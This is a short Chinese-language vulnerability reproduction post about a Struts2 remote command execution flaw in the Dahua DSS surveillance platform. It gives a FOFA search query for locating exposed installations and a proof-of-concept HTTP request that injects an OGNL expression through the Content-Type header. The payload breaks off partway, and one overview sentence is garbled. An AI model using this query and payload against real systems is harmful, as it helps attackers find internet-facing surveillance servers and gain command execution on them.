0x01 產品簡介
大華DSS安防監控系統平臺是一款集視頻、報警、存儲、管理于一體的綜合安防解決方案。該平臺支持多種接入方式,包括網絡視頻、模擬視頻、數字視頻、IP電話、對講機等。此外,該平臺還支持多種報警方式,包括移動偵測、區域入侵、越線報警、人員聚集等。
0x02 漏洞概述
大華DSS安防監控系統平臺采用ApacheStruts2作為網站應用框架。由于應用程序框架存在遠程命令執行漏洞,攻擊者可以通過在上傳文件時修改HTTP請求標頭中的Content Type值來觸發該漏洞,然后執行該漏洞。系統命令以獲取服務器權限。
0x03 復現環境
FOFA:
body="/portal/include/script/dahuaDefined/headCommon.js?type=index" && title="DSS"
0x04 漏洞復現
PoC
POST /admin/login_login.action HTTP/1.1
Host: your-ip
Content-Type: %{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container
)
)
